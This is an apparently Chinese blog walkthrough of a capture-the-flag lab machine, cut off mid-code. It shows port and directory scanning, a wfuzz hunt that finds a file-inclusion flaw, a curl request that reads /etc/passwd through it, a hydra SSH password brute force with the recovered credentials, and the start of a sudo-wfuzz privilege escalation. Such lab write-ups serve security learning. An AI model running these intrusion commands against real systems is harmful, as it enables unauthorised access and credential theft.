<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <meta name="description" content="探测nmap1234567891011121314151617181920212223242526272829303132333435363738394041┌──(root㉿kali)-[~]└─# nmap -p- 192.168.43.99                 Starting Nmap 7.95 ( https:&#x2F;&#x2F;nmap.org ) at 2026-01-08 14:52">
<meta property="og:type" content="article">
<meta property="og:title" content="zhaochoudecat">
<meta property="og:url" content="https://zhaochoudecat.github.io/2026/01/08/QQGroup/111/111/index.html">
<meta property="og:site_name" content="zhaochoudecat">
<meta property="og:description" content="探测nmap1234567891011121314151617181920212223242526272829303132333435363738394041┌──(root㉿kali)-[~]└─# nmap -p- 192.168.43.99                 Starting Nmap 7.95 ( https:&#x2F;&#x2F;nmap.org ) at 2026-01-08 14:52">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2026/png/1890547/1767859711451-17f55fae-6f9c-4e84-b216-6a9601a9544b.png?x-oss-process=image/crop,x_0,y_1322,w_1224,h_2314">
<meta property="article:published_time" content="2026-01-08T06:54:22.666Z">
<meta property="article:modified_time" content="2026-01-08T14:15:25.662Z">
<meta property="article:author" content="zhaochoudecat">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.nlark.com/yuque/0/2026/png/1890547/1767859711451-17f55fae-6f9c-4e84-b216-6a9601a9544b.png?x-oss-process=image/crop,x_0,y_1322,w_1224,h_2314">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>zhaochoudecat</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- rss -->
    
    
<meta name="generator" content="Hexo 8.1.1"></head>

<body>
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fa fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fa fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a target="_blank" rel="noopener" href="https://github.com/zhaochoudecat">Projects</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/2026/01/10/QQGroup/Moddle/Moddle/"><i class="fa fa-chevron-left" aria-hidden="true" onmouseover='$("#i-prev").toggle();' onmouseout='$("#i-prev").toggle();'></i></a></li>
        
        
        <li><a class="icon" href="/2026/01/07/QQGroup/React/React/"><i class="fa fa-chevron-right" aria-hidden="true" onmouseover='$("#i-next").toggle();' onmouseout='$("#i-next").toggle();'></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa fa-chevron-up" aria-hidden="true" onmouseover='$("#i-top").toggle();' onmouseout='$("#i-top").toggle();'></i></a></li>
        <li><a class="icon" href="#"><i class="fa fa-share-alt" aria-hidden="true" onmouseover='$("#i-share").toggle();' onmouseout='$("#i-share").toggle();' onclick='$("#share").toggle();return false;'></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://zhaochoudecat.github.io/2026/01/08/QQGroup/111/111/"><i class="fa fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://zhaochoudecat.github.io/2026/01/08/QQGroup/111/111/&text="><i class="fa fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://zhaochoudecat.github.io/2026/01/08/QQGroup/111/111/&title="><i class="fa fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://zhaochoudecat.github.io/2026/01/08/QQGroup/111/111/&is_video=false&description="><i class="fa fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=&body=Check out this article: https://zhaochoudecat.github.io/2026/01/08/QQGroup/111/111/"><i class="fa fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://zhaochoudecat.github.io/2026/01/08/QQGroup/111/111/&title="><i class="fa fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://zhaochoudecat.github.io/2026/01/08/QQGroup/111/111/&title="><i class="fa fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://zhaochoudecat.github.io/2026/01/08/QQGroup/111/111/&title="><i class="fa fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://zhaochoudecat.github.io/2026/01/08/QQGroup/111/111/&title="><i class="fa fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://zhaochoudecat.github.io/2026/01/08/QQGroup/111/111/&name=&description="><i class="fa fa-tumblr " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%8E%A2%E6%B5%8B"><span class="toc-number">1.</span> <span class="toc-text">探测</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#nmap"><span class="toc-number">1.1.</span> <span class="toc-text">nmap</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#gobuster"><span class="toc-number">1.2.</span> <span class="toc-text">gobuster</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#wfuzz"><span class="toc-number">1.3.</span> <span class="toc-text">wfuzz</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9E%84%E9%80%A0payload"><span class="toc-number">2.</span> <span class="toc-text">构造payload</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#hydra"><span class="toc-number">3.</span> <span class="toc-text">hydra</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ssh"><span class="toc-number">4.</span> <span class="toc-text">ssh</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%8F%90%E6%9D%83"><span class="toc-number">5.</span> <span class="toc-text">提权</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%84%9A%E6%9C%AC%E7%9A%84%E6%A0%B8%E5%BF%83%E4%BD%9C%E7%94%A8"><span class="toc-number">5.1.</span> <span class="toc-text">脚本的核心作用</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%B6%E4%BD%9Cpayload"><span class="toc-number">5.2.</span> <span class="toc-text">制作payload</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%89%A7%E8%A1%8Cpayload"><span class="toc-number">5.3.</span> <span class="toc-text">执行payload</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8payload"><span class="toc-number">5.4.</span> <span class="toc-text">使用payload</span></a></li></ol></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index width mx-auto px2 my4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">zhaochoudecat</span>
      </span>
      
    <div class="postdate">
        <time datetime="2026-01-08T06:54:22.666Z" itemprop="datePublished">2026-01-08</time>
    </div>


      

    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h2 id="探测"><a href="#探测" class="headerlink" title="探测"></a>探测</h2><h3 id="nmap"><a href="#nmap" class="headerlink" title="nmap"></a>nmap</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line">┌──(root㉿kali)-[~]</span><br><span class="line">└─# nmap -p- 192.168.43.99                 </span><br><span class="line">Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-08 14:52 CST</span><br><span class="line">Nmap scan report <span class="keyword">for</span> 111 (192.168.43.99)</span><br><span class="line">Host is up (0.00030s latency).</span><br><span class="line">Not shown: 65533 closed tcp ports (reset)</span><br><span class="line">PORT   STATE SERVICE</span><br><span class="line">22/tcp open  ssh</span><br><span class="line">80/tcp open  http</span><br><span class="line">MAC Address: 08:00:27:83:10:2F (PCS Systemtechnik/Oracle VirtualBox virtual NIC)</span><br><span class="line"></span><br><span class="line">┌──(root㉿kali)-[~]</span><br><span class="line">└─# nmap -p 22,80 -sVC -A 192.168.43.99    </span><br><span class="line">Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-08 14:55 CST</span><br><span class="line">Nmap scan report <span class="keyword">for</span> 111 (192.168.43.99)</span><br><span class="line">Host is up (0.00046s latency).</span><br><span class="line"></span><br><span class="line">PORT   STATE SERVICE VERSION</span><br><span class="line">22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)</span><br><span class="line">| ssh-hostkey: </span><br><span class="line">|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)</span><br><span class="line">|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)</span><br><span class="line">|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)</span><br><span class="line">80/tcp open  http    Apache httpd 2.4.62 ((Debian))</span><br><span class="line">|_http-title: 400 Bad Request</span><br><span class="line">|_http-server-header: Apache/2.4.62 (Debian)</span><br><span class="line">MAC Address: 08:00:27:83:10:2F (PCS Systemtechnik/Oracle VirtualBox virtual NIC)</span><br><span class="line">Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port</span><br><span class="line">Device <span class="built_in">type</span>: general purpose</span><br><span class="line">Running: Linux 4.X|5.X</span><br><span class="line">OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5</span><br><span class="line">OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4)</span><br><span class="line">Network Distance: 1 hop</span><br><span class="line">Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</span><br><span class="line"></span><br><span class="line">TRACEROUTE</span><br><span class="line">HOP RTT     ADDRESS</span><br><span class="line">1   0.46 ms 111 (192.168.43.99)</span><br><span class="line"></span><br><span class="line">OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</span><br><span class="line">Nmap <span class="keyword">done</span>: 1 IP address (1 host up) scanned <span class="keyword">in</span> 8.61 seconds</span><br></pre></td></tr></table></figure>

<h3 id="gobuster"><a href="#gobuster" class="headerlink" title="gobuster"></a>gobuster</h3><p>无有用的数据，那就试试<code>gobuster</code></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">┌──(root㉿kali)-[~]</span><br><span class="line">└─# gobuster <span class="built_in">dir</span> -u http://192.168.43.99 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,htm</span><br><span class="line">===============================================================</span><br><span class="line">Gobuster v3.8</span><br><span class="line">by OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)</span><br><span class="line">===============================================================</span><br><span class="line">[+] Url:                     http://192.168.43.99</span><br><span class="line">[+] Method:                  GET</span><br><span class="line">[+] Threads:                 10</span><br><span class="line">[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt</span><br><span class="line">[+] Negative Status codes:   404</span><br><span class="line">[+] User Agent:              gobuster/3.8</span><br><span class="line">[+] Extensions:              php,html,txt,htm</span><br><span class="line">[+] Timeout:                 10s</span><br><span class="line">===============================================================</span><br><span class="line">Starting gobuster <span class="keyword">in</span> directory enumeration mode</span><br><span class="line">===============================================================</span><br><span class="line">/index.html           (Status: 200) [Size: 20592]</span><br><span class="line">/file.php             (Status: 200) [Size: 0]</span><br><span class="line">/server-status        (Status: 403) [Size: 278]</span><br><span class="line">Progress: 1102790 / 1102790 (100.00%)</span><br><span class="line">===============================================================</span><br><span class="line">Finished</span><br><span class="line">===============================================================</span><br></pre></td></tr></table></figure>
<p><strong>发现<code>index.html </code>和 <code>file.php</code></strong><br>存在本地文件包含（LFI）漏洞<br>![[Pasted image 20260108151607.png]]<br><img src="https://cdn.nlark.com/yuque/0/2026/png/1890547/1767859711451-17f55fae-6f9c-4e84-b216-6a9601a9544b.png?x-oss-process=image/crop,x_0,y_1322,w_1224,h_2314"></p>
<h3 id="wfuzz"><a href="#wfuzz" class="headerlink" title="wfuzz"></a>wfuzz</h3><p>先用wfuzz测试一下</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">┌──(root㉿kali)-[~/localkali/testpayload]</span><br><span class="line">└─# wfuzz -c -w /usr/share/wordlists/wfuzz/general/common.txt --ss <span class="string">&quot;root:x:0:0&quot;</span> -u  <span class="string">&quot;http://192.168.3.42/file.php?FUZZ=/etc/passwd&quot;</span></span><br><span class="line"> /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz<span class="string">&#x27;s documentation for more information.</span></span><br><span class="line"><span class="string">********************************************************</span></span><br><span class="line"><span class="string">* Wfuzz 3.1.0 - The Web Fuzzer                         *</span></span><br><span class="line"><span class="string">********************************************************</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">Target: http://192.168.3.42/file.php?FUZZ=/etc/passwd</span></span><br><span class="line"><span class="string">Total requests: 951</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">=====================================================================</span></span><br><span class="line"><span class="string">ID           Response   Lines    Word       Chars       Payload                                                             </span></span><br><span class="line"><span class="string">=====================================================================</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">000000341:   200        26 L     38 W       1386 Ch     &quot;file&quot;                                                              </span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">Total time: 0</span></span><br><span class="line"><span class="string">Processed Requests: 951</span></span><br><span class="line"><span class="string">Filtered Requests: 950</span></span><br><span class="line"><span class="string">Requests/sec.: 0</span></span><br></pre></td></tr></table></figure>
<p>发现目标 &#x3D;&#x3D;<code>file</code>&#x3D;&#x3D;</p>
<table>
<thead>
<tr>
<th><strong>命令片段</strong></th>
<th><strong>含义 &amp; 核心作用</strong></th>
</tr>
</thead>
<tbody><tr>
<td><code>wfuzz</code></td>
<td>调用 Wfuzz 主程序，启动模糊测试工具</td>
</tr>
<tr>
<td><code>-c</code></td>
<td>启用<strong>彩色输出</strong>功能，让测试结果中的状态码、响应长度等信息按不同颜色区分，提升可读性，方便快速筛选有效结果</td>
</tr>
<tr>
<td><code>-w /usr/share/wordlists/wfuzz/general/common.txt</code></td>
<td>加载本地字典文件作为测试 payload- <code>-w</code>：指定<strong>文本格式字典文件</strong>的参数（与之前 <code>-z</code>加载序列化文件不同，专用于纯文本词表）- 后续路径：Wfuzz 自带的通用常见字典，包含常用的 URL 参数名（如 <code>file</code>、<code>path</code><br>、<code>include</code>、<code>dir</code>等）、目录名，适合基础探测</td>
</tr>
<tr>
<td><code>--ss &quot;root:x:0:0&quot;</code></td>
<td>结果筛选核心参数，<strong>只保留响应内容中包含指定字符串的请求</strong>- <code>--ss</code>：全称 <code>--string-match</code>，意为 “字符串匹配”，反向参数是 <code>--hs</code>（隐藏匹配指定字符串的结果）- <code>&quot;root:x:0:0&quot;</code>：Linux 系统 <code>/etc/passwd</code>文件中 root 用户的标志性内容，只有成功读取到该文件，响应中才会包含此字符串，以此判断漏洞是否存在</td>
</tr>
<tr>
<td><code>-u &quot;http://192.168.3.42/file.php?FUZZ=/etc/passwd&quot;</code></td>
<td>指定测试目标 URL 及模糊测试位置- <code>-u</code>：目标 URL 参数    - <code>file.php</code>待测试的后端脚本文件; - <code>FUZZ</code>：Wfuzz 占位符，此处位于 URL 的查询参数名位置，执行时会被 <code>common.txt</code><br>中的每一个字典值替换（例如替换为 <code>file</code>、<code>path</code>等，形成 <code>?file=/etc/passwd</code>、<code>?path=/etc/passwd</code><br>等请求）- <code>/etc/passwd</code>：待读取的 Linux 敏感系统文件，作为查询参数的值，用于尝试触发文件包含</td>
</tr>
</tbody></table>
<h2 id="构造payload"><a href="#构造payload" class="headerlink" title="构造payload"></a>构造payload</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl -v http://192.168.43.99/file.php\?file\=/etc/passwd</span><br></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line">*   Trying 192.168.43.99:80...</span><br><span class="line">* Connected to 192.168.43.99 (192.168.43.99) port 80</span><br><span class="line">&gt; GET /file.php?file=/etc/passwd HTTP/1.1</span><br><span class="line">&gt; Host: 192.168.43.99</span><br><span class="line">&gt; User-Agent: curl/8.7.1</span><br><span class="line">&gt; Accept: */*</span><br><span class="line">&gt; </span><br><span class="line">* Request completely sent off</span><br><span class="line">&lt; HTTP/1.1 200 OK</span><br><span class="line">&lt; Date: Thu, 08 Jan 2026 07:51:37 GMT</span><br><span class="line">&lt; Server: Apache/2.4.62 (Debian)</span><br><span class="line">&lt; Vary: Accept-Encoding</span><br><span class="line">&lt; Content-Length: 1386</span><br><span class="line">&lt; Content-Type: text/html; charset=UTF-8</span><br><span class="line">&lt; </span><br><span class="line">root:x:0:0:root:/root:/bin/bash</span><br><span class="line">daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin</span><br><span class="line">bin:x:2:2:bin:/bin:/usr/sbin/nologin</span><br><span class="line">sys:x:3:3:sys:/dev:/usr/sbin/nologin</span><br><span class="line"><span class="built_in">sync</span>:x:4:65534:<span class="built_in">sync</span>:/bin:/bin/sync</span><br><span class="line">games:x:5:60:games:/usr/games:/usr/sbin/nologin</span><br><span class="line">man:x:6:12:man:/var/cache/man:/usr/sbin/nologin</span><br><span class="line">lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin</span><br><span class="line">mail:x:8:8:mail:/var/mail:/usr/sbin/nologin</span><br><span class="line">news:x:9:9:news:/var/spool/news:/usr/sbin/nologin</span><br><span class="line">uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin</span><br><span class="line">proxy:x:13:13:proxy:/bin:/usr/sbin/nologin</span><br><span class="line">www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin</span><br><span class="line">backup:x:34:34:backup:/var/backups:/usr/sbin/nologin</span><br><span class="line">list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin</span><br><span class="line">irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin</span><br><span class="line">gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin</span><br><span class="line">nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin</span><br><span class="line">_apt:x:100:65534::/nonexistent:/usr/sbin/nologin</span><br><span class="line">systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin</span><br><span class="line">systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin</span><br><span class="line">systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin</span><br><span class="line">systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin</span><br><span class="line">messagebus:x:104:110::/nonexistent:/usr/sbin/nologin</span><br><span class="line">sshd:x:105:65534::/run/sshd:/usr/sbin/nologin</span><br><span class="line">tao:x:1000:1000:,,,:/home/tao:/bin/bash</span><br><span class="line">* Connection <span class="comment">#0 to host 192.168.43.99 left intact</span></span><br></pre></td></tr></table></figure>
<p>发现有个&#x3D;&#x3D;<code>tao</code>&#x3D;&#x3D;用户, 结合<code>80</code>端口页面，提示我们使用 <code>rockyou.tx</code> 爆破密码了<br>![[Pasted image 20260108160436.png]]</p>
<h2 id="hydra"><a href="#hydra" class="headerlink" title="hydra"></a>hydra</h2><p>一开始很慢，看到提示<code>-t 4</code>，加上很快就爆破出来</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">┌──(root㉿kali)-[~]</span><br><span class="line">└─# hydra -t 4  -l tao -P /usr/share/wordlists/rockyou.txt ssh://192.168.43.99</span><br><span class="line">Hydra v9.6 (c) 2023 by van Hauser/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).</span><br><span class="line"></span><br><span class="line">Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-01-08 16:15:00</span><br><span class="line">[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore</span><br><span class="line">[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task</span><br><span class="line">[DATA] attacking ssh://192.168.43.99:22/</span><br><span class="line">[22][ssh] host: 192.168.43.99   login: tao   password: rockyou</span><br><span class="line">1 of 1 target successfully completed, 1 valid password found</span><br><span class="line">Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-01-08 16:15:19</span><br></pre></td></tr></table></figure>

<p>爆破结果<br>&#x3D;&#x3D;<code>[22][ssh] host: 192.168.43.99   login: tao   password: rockyou</code>&#x3D;&#x3D;</p>
<h2 id="ssh"><a href="#ssh" class="headerlink" title="ssh"></a>ssh</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">tao@111:~$ cat user.txt </span><br><span class="line">flag&#123;user-21747e1ca09bfcc4f2551263db0f3dff&#125;</span><br></pre></td></tr></table></figure>

<h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h2><p>发现两个 <code>(ALL) NOPASSWD: /usr/bin/wfuzz </code>和 <code>(ALL) NOPASSWD: /usr/bin/id</code></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line">tao@111:~$ <span class="built_in">sudo</span> -l</span><br><span class="line">Matching Defaults entries <span class="keyword">for</span> tao on 111:</span><br><span class="line">    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin</span><br><span class="line"></span><br><span class="line">User tao may run the following commands on 111:</span><br><span class="line">    (ALL) NOPASSWD: /usr/bin/wfuzz</span><br><span class="line">    (ALL) NOPASSWD: /usr/bin/id</span><br><span class="line">    </span><br><span class="line">tao@111:~$ <span class="built_in">cat</span> /usr/bin/wfuzz</span><br><span class="line"><span class="comment">#!/usr/bin/python3</span></span><br><span class="line"><span class="comment"># EASY-INSTALL-ENTRY-SCRIPT: &#x27;wfuzz==3.1.0&#x27;,&#x27;console_scripts&#x27;,&#x27;wfuzz&#x27;</span></span><br><span class="line">import re</span><br><span class="line">import sys</span><br><span class="line"></span><br><span class="line"><span class="comment"># for compatibility with easy_install; see #2198</span></span><br><span class="line">__requires__ = <span class="string">&#x27;wfuzz==3.1.0&#x27;</span></span><br><span class="line"></span><br><span class="line">try:</span><br><span class="line">    from importlib.metadata import distribution</span><br><span class="line">except ImportError:</span><br><span class="line">    try:</span><br><span class="line">        from importlib_metadata import distribution</span><br><span class="line">    except ImportError:</span><br><span class="line">        from pkg_resources import load_entry_point</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def importlib_load_entry_point(spec, group, name):</span><br><span class="line">    dist_name, _, _ = spec.partition(<span class="string">&#x27;==&#x27;</span>)</span><br><span class="line">    matches = (</span><br><span class="line">        entry_point</span><br><span class="line">        <span class="keyword">for</span> entry_point <span class="keyword">in</span> distribution(dist_name).entry_points</span><br><span class="line">        <span class="keyword">if</span> entry_point.group == group and entry_point.name == name</span><br><span class="line">    )</span><br><span class="line">    <span class="built_in">return</span> next(matches).load()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">globals().setdefault(<span class="string">&#x27;load_entry_point&#x27;</span>, importlib_load_entry_point)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    sys.argv[0] = re.sub(r<span class="string">&#x27;(-script\.pyw?|\.exe)?$&#x27;</span>, <span class="string">&#x27;&#x27;</span>, sys.argv[0])</span><br><span class="line">    sys.exit(load_entry_point(<span class="string">&#x27;wfuzz==3.1.0&#x27;</span>, <span 